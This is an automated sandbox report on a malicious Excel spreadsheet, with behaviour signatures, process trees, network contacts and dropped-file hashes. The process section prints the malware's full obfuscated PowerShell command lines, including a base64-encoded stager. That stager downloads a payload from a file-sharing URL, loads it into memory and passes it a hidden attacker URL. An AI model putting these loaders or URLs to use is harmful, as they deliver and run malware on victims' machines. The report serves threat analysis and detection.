Malware Analysis Report

2024-12-07 16:55

Sample ID: 241113-cxjtcavdnd
Target: 61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls
SHA256: 61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315
Tags: defense_evasion discovery execution
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315

Threat Level: Known bad

The file 61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Evasion via Device Credential Deployment

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Uses Task Scheduler COM API

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-13 02:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-13 02:27
Reported: 2024-11-13 02:29
Platform: win7-20240903-en
Max time kernel: 140s
Max time network: 141s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2844 wrote to memory of 2576 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe
PID 2576 wrote to memory of 1200 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2016 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2016 wrote to memory of 2304 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2576 wrote to memory of 1456 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WScript.exe
PID 1456 wrote to memory of 2976 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2976 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe

"C:\Windows\sYSTEm32\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe" "pOWErSHELl.eXE -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe ; IeX($(IeX('[sysTem.tEXT.ENCODInG]'+[CHAR]58+[ChaR]58+'Utf8.gETsTriNg([SYSteM.cOnvERt]'+[chaR]0X3A+[chAr]58+'FROMBaSe64STRing('+[ChAr]0X22+'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'+[ChaR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hpapsbpf.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA67.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFA66.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsofgirlssheisamonther.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdiVnBpbWFnZVVybCA9IE1SQmh0dHBzOi8vMTAxNy5maWxlbWFpbC5jJysnb20vYXBpL2ZpbGUvZycrJ2V0PycrJ2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEsnKydqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGInKydiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgTVJCO2JWcHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7YlZwaW1hZ2VCeXRlcyA9IGJWcHdlYkNsaWVudC4nKydEb3dubG9hZERhdGEoYlZwaW1hZ2VVcmwpO2JWcGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGJWcGltYWdlQnl0ZXMpO2JWcHMnKyd0YXJ0RmxhZyA9IE1SQjw8QkFTRTY0X1NUQVJUPj5NUkI7YlZwZW5kRmxhZyA9IE1SQjw8QkFTRTY0X0VORD4+TVJCO2JWcHN0YXJ0SW5kZXggPSBiVnBpbWFnZVRleHQuSW5kZXhPZihiVnBzdGFydEZsYWcpO2JWcGVuZEluZGV4ID0gYlZwaW1hZ2VUZXh0LkluZGV4T2YoYlZwZW5kRmxhZyk7YlZwc3RhcnRJbmRlJysneCAtZ2UgMCAtYW5kICcrJ2JWcGVuZEluZGV4IC1ndCBiJysnVnBzdGFydEluZGV4O2JWcHN0YXJ0SW5kJysnZXggKz0gYlZwc3RhcnRGbGFnLkxlbmd0aDtiVnBiYXMnKydlNjRMZW5ndGggPSBiVicrJ3BlbmRJbmRleCAtIGJWcHN0YXJ0SW5kZXg7YlZwYmFzZTY0Q29tbWFuZCA9IGJWJysncGknKydtYWcnKydlVGV4dC5TdWJzdHJpbmcoYlZwc3RhcnRJbmRlJysneCcrJywgYlZwYmFzZTY0TGVuZ3QnKydoKTtiVnBiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChiVnBiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5JysnKCkgdkdRIEZvckVhY2gtT2JqZWN0IHsgYlZwJysnXyB9KVstMS4uLShiVnBiYXNlNjRDb21tYW5kJysnLkxlbmd0aCcrJyldO2JWcGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyJysnb21CYXNlNjRTdHJpbmcoYlZwYmFzZTY0UmV2ZScrJ3InKydzZScrJ2QpO2JWcGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChiVnBjbycrJ21tYW4nKydkQnl0ZXMpO2JWcHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoTVJCVkFJTVJCKTtiVnB2YWlNZXRob2QuSW52b2tlKGJWcG51bGwsIEAoTVJCdHh0LlJSRlRSVy8xMzMvMzMyLjIxMi4zMi44OTEnKycvLzpwdHRoTVJCLCBNUkJkZScrJ3NhdGl2YWRvTVJCLCBNUkJkZXNhdGl2YWRvTVJCLCBNUkJkZXNhdGknKyd2YWRvTVJCLCBNUkJDYXNQb2xNUkIsIE1SQmRlJysnc2F0aXZhZG9NUkInKycsIE1SQmRlc2F0aXZhZG9NUkIsTVJCZGVzYXRpdmFkb01SQixNUkInKydkZXNhdGl2YWRvTVJCLE1SQmRlc2F0aXZhZG9NUkIsTScrJ1JCZGVzYXRpdmFkb01SQixNUkJkZXNhJysndCcrJ2l2YWRvTVJCLE1SQjFNUkIsTVJCJysnZGVzYXRp
dmFkb01SQikpOycpLlJFcExhQ2UoKFtjSEFyXTk4K1tjSEFyXTg2K1tjSEFyXTExMiksW1N0cklOR11bY0hBcl0zNikuUkVwTGFDZSgndkdRJyxbU3RySU5HXVtjSEFyXTEyNCkuUkVwTGFDZSgnTVJCJyxbU3RySU5HXVtjSEFyXTM5KXwmKCAkU2hFTGxJZFsxXSskc0hlTGxJRFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('bVpimageUrl = MRBhttps://1017.filemail.c'+'om/api/file/g'+'et?'+'filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTK'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614b'+'b209c62c1730945176a0904f MRB;bVpwebClient = New-Object System.Net.WebClient;bVpimageBytes = bVpwebClient.'+'DownloadData(bVpimageUrl);bVpimageText = [System.Text.Encoding]::UTF8.GetString(bVpimageBytes);bVps'+'tartFlag = MRB<<BASE64_START>>MRB;bVpendFlag = MRB<<BASE64_END>>MRB;bVpstartIndex = bVpimageText.IndexOf(bVpstartFlag);bVpendIndex = bVpimageText.IndexOf(bVpendFlag);bVpstartInde'+'x -ge 0 -and '+'bVpendIndex -gt b'+'VpstartIndex;bVpstartInd'+'ex += bVpstartFlag.Length;bVpbas'+'e64Length = bV'+'pendIndex - bVpstartIndex;bVpbase64Command = bV'+'pi'+'mag'+'eText.Substring(bVpstartInde'+'x'+', bVpbase64Lengt'+'h);bVpbase64Reversed = -join (bVpbase64Command.ToCharArray'+'() vGQ ForEach-Object { bVp'+'_ })[-1..-(bVpbase64Command'+'.Length'+')];bVpcommandBytes = [System.Convert]::Fr'+'omBase64String(bVpbase64Reve'+'r'+'se'+'d);bVploadedAssembly = [System.Reflection.Assembly]::Load(bVpco'+'mman'+'dBytes);bVpvaiMethod = [dnlib.IO.Home].GetMethod(MRBVAIMRB);bVpvaiMethod.Invoke(bVpnull, @(MRBtxt.RRFTRW/133/332.212.32.891'+'//:ptthMRB, MRBde'+'sativadoMRB, MRBdesativadoMRB, MRBdesati'+'vadoMRB, MRBCasPolMRB, MRBde'+'sativadoMRB'+', MRBdesativadoMRB,MRBdesativadoMRB,MRB'+'desativadoMRB,MRBdesativadoMRB,M'+'RBdesativadoMRB,MRBdesa'+'t'+'ivadoMRB,MRB1MRB,MRB'+'desativadoMRB));').REpLaCe(([cHAr]98+[cHAr]86+[cHAr]112),[StrING][cHAr]36).REpLaCe('vGQ',[StrING][cHAr]124).REpLaCe('MRB',[StrING][cHAr]39)|&( $ShELlId[1]+$sHeLlID[13]+'x')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 198.23.212.233:80 198.23.212.233 tcp
KR 221.146.204.133:443 4t.gg tcp
US 198.23.212.233:80 198.23.212.233 tcp
US 198.23.212.233:80 198.23.212.233 tcp
US 8.8.8.8:53 1017.filemail.com udp
US 142.215.209.78:443 1017.filemail.com tcp
US 142.215.209.78:443 1017.filemail.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 fca2d4075e78fd8330d5590ee560451b
SHA1 b7ab976b0f45facd4a29a6aded52515523cd756b
SHA256 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512 f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 84da1fa0a8668590c3a367aab2d0c397
SHA1 d8bfc05bb73c1eab09d45b8ef69b367fd2e80198
SHA256 061378e048a632cd78e3feea719f9b786155b7eb6e4f6b132a57a6371d22c843
SHA512 6b5f09b57a4d75e0e44fcac79f7fbdf6430d840944a0993cce3cfbf5c37ee99817d34f29543ade6e76e8fc21460a3d07161f88ee308478ef1a8f6573d1563569

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 17eb5c74b13d2e30a7f133f75bf94d1d
SHA1 26d436eed1f3f53d21270a2d7aeb3f173b569308
SHA256 11edd19b5007104334471b5d5a846bb4d920e3e097dea0176956f5a3d3b412d7
SHA512 bd32c9aee95132693bb784c3d26700dccc58e97a6dcd8d4c30cd4a19ee57ee008bc05a0a5f4fbd186ec9be8f8f3bac10a02b5c73693939b83c27d75722739423

C:\Users\Admin\AppData\Local\Temp\CabF1BE.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\mitradesignworkgoodforeveryoneforgiftedmbestthings[1].hta

MD5 37a0b6a74ad79df551606fac2c7fc164
SHA1 3f4aac72c2cfccf897597e95bec0f63e734428d0
SHA256 3a5d43a60266671e60cce1d630ca663acd70d8eec5acd0a1078db2deb1ed516f
SHA512 83ea0410d687c62cae37d07c511fd0279357676ba54245dca254a5b8ec644c216e9e4f94eb5283bfc0b25109bbd209bfeffddfafa8889a296f4083a18aca994a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 da62dfb1897cfe193af5bdd748f613c6
SHA1 b6e1ce5dbf0e7b02d8b9c62276df5eb4f6d66e9d
SHA256 6150d2f2b2fb8a0f6de46a66095aaaba9b115d8e923b0bcf2bf01703c70ae77d
SHA512 e7e98f60eaf83f3c5785737879cca094e612c6c93b7a7d5528a65e86de661230973d5786921aa419c9b64aa502c13282369181e2548a98301f144fee134b601e

\??\c:\Users\Admin\AppData\Local\Temp\hpapsbpf.cmdline

MD5 7d287ab52e4b4bd1d2f248fc56286f7b
SHA1 b0462abf61bb49e6a5e93c62ba024329b8945b9f
SHA256 e990a5fe9abbe826928bb5dbd7ef1844914b371096193a6dd31254689d77d8bb
SHA512 381cbe3fba85be2096594d43bf5081b0f6e78903b1baf4193b727fd987dc390243d950d3c4e163a1b3558042faaecc072eb39401cab8f80e9e2b3c96c9584921

\??\c:\Users\Admin\AppData\Local\Temp\hpapsbpf.0.cs

MD5 381b1194ec5fc354bf3696ed51323c18
SHA1 7d58fdbfdaa987d85d72478f3d225686b2d8dabe
SHA256 4acc1cdda62e68a822d5fd6dc065d75cb465390d1f4be7d046f811437a784455
SHA512 7f434aaf3b20b7bdf694e5e14c7bd60fe4470b8ea73742ea969b282d27d4b6c18101229aef7b547774beb44f4d8c21769a11e4b3a5a833c773fea7fbe5e4a750

\??\c:\Users\Admin\AppData\Local\Temp\CSCFA66.tmp

MD5 4244fac53aa84d3c1b0ac6a41b1f4f12
SHA1 ead0b1e03d0406df40d13f579277d53b2b45a0fa
SHA256 93f5383ee1b032b3871e1d683d58a84aee9b53251bf13633875c5c605bba5ccb
SHA512 18bdeea7c8722693bfecd5f0556979c5160f6b863c73a914d5bea95c9707c96f7d0fd304ce7488645f6486502fca8bfc0cc691a2a1cb8e389c742128a0946beb

C:\Users\Admin\AppData\Local\Temp\RESFA67.tmp

MD5 a4adda4606efb82642fa928d0b15b068
SHA1 64a172943b3327330351f6c30a9e0205e44f63c6
SHA256 65e09596afce7fab22196a473ff013e24dda2d3f036f7b766b26890cc6fde96d
SHA512 5d8696e8dcb15c7f6827ddbb76d3ef91a1fd0277294bc729c5727afd54608e46e30aa29041fa9e5dc1f43e0003990bcd318493cc9c9b1db5e974a8ed626b7512

C:\Users\Admin\AppData\Local\Temp\hpapsbpf.dll

MD5 29f33f3360d741b3790f3b8a2acc0c93
SHA1 ea29ee1a7abc6b2d285b6e63e68637748bf36d32
SHA256 8a80769deea7abcb9b961df234375ab507dc5d5cb690e5a8ad05ea0a998063b6
SHA512 c6e085ef8c781f93c4e511245e46d7bbb17a8ca3b4ad4ae104d991844201ad2899cdc49b8ff5c0920a57fc9a6c6a7af31a70a2b9041a0f085742ca4ac4cc5bb5

C:\Users\Admin\AppData\Local\Temp\hpapsbpf.pdb

MD5 c2d7682fd47102a0b80fb0b751be1c95
SHA1 d11c21d2481ed0426733a2c1ec8ef5363f20b562
SHA256 1130f1a9559f542c9dc447a7405760c19df48055ff9b198348f92557912a3e3a
SHA512 ecb7f181e4692b1df37a35aa4e257fb9ec7b17e629688123e5ebeabf45f5c5d4656ff355e31593be5e258c4e1b8046e95160503181ba6c4ce7182b92a68fa617

C:\Users\Admin\AppData\Roaming\seethebestthingsofgirlssheisamonther.vbS

MD5 a859403a72c197e1753a1519aac692e3
SHA1 7fbfdbb1384879f2ce069c72e4ce7b437bac8c0c
SHA256 4b3e15d8f27431ef7ba26051739774ac4ab9d5584b28bff4489cf503d434f38c
SHA512 9063f5760623203dd494a335040a57c3ab9a41193344f872739e0e55b43fccbb81033c528dd007952198ce089ab3dd8c9ef3b0d2b9eaba628a05b960def11ee9

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 ed417838248928f3b940dde15ae54c8d
SHA1 473d41a0c73d76f003cb001a7127acfa58144129
SHA256 3456e1b47c3e092fe921cd3b2172a8c71068affd8f82cf50f2358a26d80bf82c
SHA512 3e9285f120461b15d04a00c007c31d883c8779465c291643c8356b24a6de0cc37f58183242e68efc9d3307e75445063659066fe4a44e7484fbff4e0310f0af83

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-13 02:27
Reported: 2024-11-13 02:29
Platform: win10v2004-20241007-en
Max time kernel: 144s
Max time network: 140s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2884 wrote to memory of 1820 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 198.23.212.233:80 198.23.212.233 tcp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 233.212.23.198.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 f59dbdf0187527f62589cb0e8e7bf603
SHA1 aa5556daa12c1b48340b297ec2ebf38e800d5338
SHA256 30bf72f7907e19a2a21742089c1b93eecbb0e8cbf7334cd0d1cff0e05df3eb3f
SHA512 f445c654db5f08febeb9b67c7fceaf9ca799519cbd0ac732b38e9eef3ecc63c2dbd1351e02e75d3962bf9cb5b2b1c7358674321f480830cc4a89a1f1acbdb70d